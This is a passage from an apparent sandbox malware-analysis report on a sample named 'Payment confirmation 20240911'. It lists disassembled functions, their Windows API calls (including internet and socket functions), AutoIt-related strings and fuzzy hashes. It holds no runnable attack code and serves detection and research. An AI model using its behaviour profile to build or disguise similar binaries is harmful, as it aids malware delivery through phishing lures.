                                          • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 0133581D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CrackInternet_memset
                                          • String ID: |
                                          • API String ID: 1413715105-2343686810
                                          • Opcode ID: 8a84b5092a6bb72a2579a052f047fafdc71ccea28378048c0fbbc6bb1805e523
                                          • Instruction ID: 09c529add7c9fb29bec86e866c0777971451f34675d6b05058725933d99f27a4
                                          • Opcode Fuzzy Hash: 8a84b5092a6bb72a2579a052f047fafdc71ccea28378048c0fbbc6bb1805e523
                                          • Instruction Fuzzy Hash: 09313B7291011AABCF11AFA4CC94EEEBFF8FF28304F104019E815A6161DB319A16CB60
                                          Function 01349567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32 ref: 0134961B
                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 01349657
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$DestroyMove
                                          • String ID: static
                                          • API String ID: 2139405536-2160076837
                                          • Opcode ID: edcbe7f4aadf616f831b749ac2485f43fd0e6fe5751752eb218b01fae917f925
                                          • Instruction ID: 49caa419b2ee23bebd858eb7ad18557ec2f4c8206b63c82e4d142ea81ba839d9
                                          • Opcode Fuzzy Hash: edcbe7f4aadf616f831b749ac2485f43fd0e6fe5751752eb218b01fae917f925
                                          • Instruction Fuzzy Hash: A4319E31500204AFEB219F68D880FBB77ADFF48768F108519F9A9C7190CA35A891DB60
                                          Function 01325B75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: InfoItemMenu_memset
                                          • String ID: 0
                                          • API String ID: 2223754486-4108050209
                                          • Opcode ID: db95c6ad8ac20bb92e3e2313870503ecd19eaf1604c4a948b88b27385a839cc4
                                          • Instruction ID: 87d566ec4a4764cd07bdb48fc1d0264a1ab7d915a1376a9dbc6d29c517f29a5b
                                          • Opcode Fuzzy Hash: db95c6ad8ac20bb92e3e2313870503ecd19eaf1604c4a948b88b27385a839cc4
                                          • Instruction Fuzzy Hash: 5D31C871500229ABEF25AF9CC884BDD7FF8EF05358F180119EA8197190E7709744CF10
                                          Function 01336B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                          Download Yara Rule
                                          APIs
                                          • __snwprintf.LIBCMT ref: 01336BDD
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: __snwprintf_memmove
                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                          • API String ID: 3506404897-2584243854
                                          • Opcode ID: 92285b0309e562f4a5937aef7f6c4b922046bf2f811b99e8b8b66b316402bafc
                                          • Instruction ID: 1dded2298ac61d6dea0ebcf3cdd6797c3887cc806b5b1623b516686b1eb85b55
                                          • Opcode Fuzzy Hash: 92285b0309e562f4a5937aef7f6c4b922046bf2f811b99e8b8b66b316402bafc
                                          • Instruction Fuzzy Hash: EB21BF71A1011ABFCF14EFA9C895EAE77F4FF94704F404459E506A7240DB34EA41CB65
                                          Function 012FAFB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 012FAF8E
                                            • Part of subcall function 012FB155: GetWindowLongW.USER32(?,000000EB), ref: 012FB166
                                          • GetParent.USER32(?), ref: 0135F4B5
                                          • DefDlgProcW.USER32(?,00000133,?,?,?,?,?,?,?,?,012FADDD,?,?,?,00000006,?), ref: 0135F52F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: LongWindow$ParentProc
                                          • String ID: `"u
                                          • API String ID: 2181805148-810275233
                                          • Opcode ID: 00e0f8cf2ce0666b37c41f43c4df497508932aec3b1895a80ca774878ee1e06d
                                          • Instruction ID: e265a87aaa027b2e61a800095fec18d01844c4fa38fd64c56c0b6488be994611
                                          • Opcode Fuzzy Hash: 00e0f8cf2ce0666b37c41f43c4df497508932aec3b1895a80ca774878ee1e06d
                                          • Instruction Fuzzy Hash: C2219135610105AFEB399E2CC848FA97FAAEF09368F08426CF7295B2E2C7709911D710
                                          Function 013491DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 01349269
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01349274
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: Combobox
                                          • API String ID: 3850602802-2096851135
                                          • Opcode ID: ca94b69df5b9844844258355854710a103690d0e9b331d7b115d2a8d43e6a109
                                          • Instruction ID: ecdb5bb6aeafde856954432b54f214a36a8b01f79c08af30a6d2b05d2ecd2479
                                          • Opcode Fuzzy Hash: ca94b69df5b9844844258355854710a103690d0e9b331d7b115d2a8d43e6a109
                                          • Instruction Fuzzy Hash: 9611637170010DAFEF22DE58DC80FBB77AEEB893ACF114125F91897291D675AC5187A0
                                          Function 0134C1EE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `"u
                                          • API String ID: 0-810275233
                                          • Opcode ID: 00346da60870ae740bc9ca02a789e767d9337bf3f889d91016d105bcebea05f5
                                          • Instruction ID: 0df22e51e220f40fa6f5697514b8230c6ac715b5b039f59c4840d89d9edabb0c
                                          • Opcode Fuzzy Hash: 00346da60870ae740bc9ca02a789e767d9337bf3f889d91016d105bcebea05f5
                                          • Instruction Fuzzy Hash: 89118E35211209BBEF148FD8CD05FBA7BE8EB05758F008115FA5AAA0D0D6F0E610DB60
                                          Function 0134970B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012FC619: CreateWindowExW.USER32 ref: 012FC657
                                            • Part of subcall function 012FC619: GetStockObject.GDI32(00000011), ref: 012FC66B
                                            • Part of subcall function 012FC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 012FC675
                                          • GetWindowRect.USER32(00000000,?), ref: 01349775
                                          • GetSysColor.USER32(00000012,?,?,static,?,00000000,?,?,?,00000001,?,?,00000001,?), ref: 0134978F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                          • String ID: static
                                          • API String ID: 1983116058-2160076837
                                          • Opcode ID: 1cc1374e177d715c16c26dc64e899e7fb14746f0b945a1ea5df0fafc51040193
                                          • Instruction ID: 61e1f0a8c5103cf0c38a8276f8d79cd5a430852185f48b9a62c117ea7564e92b
                                          • Opcode Fuzzy Hash: 1cc1374e177d715c16c26dc64e899e7fb14746f0b945a1ea5df0fafc51040193
                                          • Instruction Fuzzy Hash: 6211267261020AAFDB05DFB8D845EEA7BE8EB08318F004529FA56E3250E735E851DB50
                                          Function 01349293 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CreateMenuPopup
                                          • String ID: `"u
                                          • API String ID: 3826294624-810275233
                                          • Opcode ID: 880ff070898923b744855a98a21a414ca692c863b7e65ff80a9d23ab855ec245
                                          • Instruction ID: d587b8cef2273f8959eb50618f3139d36eb472d207868d835a48723b8f358d06
                                          • Opcode Fuzzy Hash: 880ff070898923b744855a98a21a414ca692c863b7e65ff80a9d23ab855ec245
                                          • Instruction Fuzzy Hash: 4F212839600609DFDB25CF68C044BD67BE9FB4E328F488259E99A9B391D330B952CF51
                                          Function 01349424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowTextLengthW.USER32(00000000,?,?,edit,?,00000000,?,?,?,?,?,?,00000001,?), ref: 013494A6
                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 013494B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: LengthMessageSendTextWindow
                                          • String ID: edit
                                          • API String ID: 2978978980-2167791130
                                          • Opcode ID: 348c1d76b632aaa0e10a7b49783cadcb8de01f520c9e8a17dc669acdc033a721
                                          • Instruction ID: 5061f638450ce05f05be9ffcb230f9ce790b92c3c6cb1aedd05399c8e48cd5cc
                                          • Opcode Fuzzy Hash: 348c1d76b632aaa0e10a7b49783cadcb8de01f520c9e8a17dc669acdc033a721
                                          • Instruction Fuzzy Hash: 35116D71100108AFEB219EA8DC40FAB3BADEB0937CF504724FA65A32D1C775EC519B60
                                          Function 0134AFEE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,?,?,?), ref: 0134B03B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: `"u
                                          • API String ID: 3850602802-810275233
                                          • Opcode ID: c8b6235f2723c3d845fdaf9285ef77fb2596b60b667e8fa2cbda22268954d365
                                          • Instruction ID: ea1208a5907f08b4849efb8eb6f2a3a11c258d41c1524f82d91909cda9d6c1fe
                                          • Opcode Fuzzy Hash: c8b6235f2723c3d845fdaf9285ef77fb2596b60b667e8fa2cbda22268954d365
                                          • Instruction Fuzzy Hash: 6921D67960010AEFCF15CF98C840CAABBB9FB4D344B004555FE1693318D731E921DB90
                                          Function 013353F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0133544C
                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 01335475
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Internet$OpenOption
                                          • String ID: <local>
                                          • API String ID: 942729171-4266983199
                                          • Opcode ID: 995e4e582eee82170b6cd6d0a9c5db17d39cdebf2b33d6d4c558bc576d3afdf8
                                          • Instruction ID: 394972122aa2805b3c748483bf3d6c1b67bef0cb2a3b27e1cd7e7233262f48c6
                                          • Opcode Fuzzy Hash: 995e4e582eee82170b6cd6d0a9c5db17d39cdebf2b33d6d4c558bc576d3afdf8
                                          • Instruction Fuzzy Hash: E211C2B0341265BADB298F65C884EFBFFACFF4665AF00822AF54566440E3706590C6F5
                                          Function 012FACD1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `"u
                                          • API String ID: 0-810275233
                                          • Opcode ID: 9f6a37bad37491e56f76d8af0fd38514f7bde3b657de2f4e66c5bcc1798f57ef
                                          • Instruction ID: 7be509f48c94e2a385814bc0bd57770e6420d0a83575198b6782887c8be670c1
                                          • Opcode Fuzzy Hash: 9f6a37bad37491e56f76d8af0fd38514f7bde3b657de2f4e66c5bcc1798f57ef
                                          • Instruction Fuzzy Hash: 4E119E35210204DFDB20DF2CC880E95BBEABB4A724F544229EA599B2E1C370B941CB90
                                          Function 0133ACD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0133ACF5
                                          • htons.WSOCK32(00000000,?,00000000), ref: 0133AD32
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: htonsinet_addr
                                          • String ID: 255.255.255.255
                                          • API String ID: 3832099526-2422070025
                                          • Opcode ID: da2974bf28561b313c5e48355f0e0f59afe21e376e35fc822a91ad978c08a61f
                                          • Instruction ID: 7b5e6083130ff32e527fbc166ff50479db2dc7fb6b10fd9154b52de27fcaebec
                                          • Opcode Fuzzy Hash: da2974bf28561b313c5e48355f0e0f59afe21e376e35fc822a91ad978c08a61f
                                          • Instruction Fuzzy Hash: BF012879200205ABCB20DFA8C859FADB378FF99728F108516E555DB2D1DB71E804C759
                                          Function 0131C577 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0131C5E5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1456604079-1403004172
                                          • Opcode ID: 10b2ea525877bc11bc332786a288ce9c9416a542a6adff2a26b9f0c26ab6505a
                                          • Instruction ID: fbd22419551c05a980bddd3f6641342925bbc7f7de053c5bfb7e6eed2ebe9cd9
                                          • Opcode Fuzzy Hash: 10b2ea525877bc11bc332786a288ce9c9416a542a6adff2a26b9f0c26ab6505a
                                          • Instruction Fuzzy Hash: BC012F71661119AFDB08EBA8CC60CFF33AAAF12214B440B18E863E32D4DF3498088750
                                          Function 0132C4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: __fread_nolock_memmove
                                          • String ID: EA06
                                          • API String ID: 1988441806-3962188686
                                          • Opcode ID: 78f2994f19ca4d9b420cd9f37036d564e15e0f9b41d823ec80016c7def36d0ab
                                          • Instruction ID: 8be3b21cb617cfcc359d25b8fa6ec965363e571e9b9534b8023be68d55fabc24
                                          • Opcode Fuzzy Hash: 78f2994f19ca4d9b420cd9f37036d564e15e0f9b41d823ec80016c7def36d0ab
                                          • Instruction Fuzzy Hash: 6E01F572900228AEDB29D7ACC815FBEBBF89B15215F00415EE293E22C1E474E708CB60
                                          Function 0131C473 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 0131C4E1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1456604079-1403004172
                                          • Opcode ID: 30c7fbf7ad0990c69e4788f56cc2d021c378a8b73a80a584f621f8a08a687f32
                                          • Instruction ID: 40f43a6c49eb698c4eda41c8652795e027e496774bcccfc5cf7e0bbfcb5d8767
                                          • Opcode Fuzzy Hash: 30c7fbf7ad0990c69e4788f56cc2d021c378a8b73a80a584f621f8a08a687f32
                                          • Instruction Fuzzy Hash: 450126716910097BDB19EBA8C962EFF33EC9F21608F540429E943F32C4DF149E1983A1
                                          Function 0131C4F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 0131C562
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1456604079-1403004172
                                          • Opcode ID: c3cac57241a5c251e9116af0e5402f8bbd65f64aefd1da95371f7dce05355a68
                                          • Instruction ID: f5c9b3e3f39b49008d40618d589b11332f4fe3fea07b09acd4ead378d22c98ef
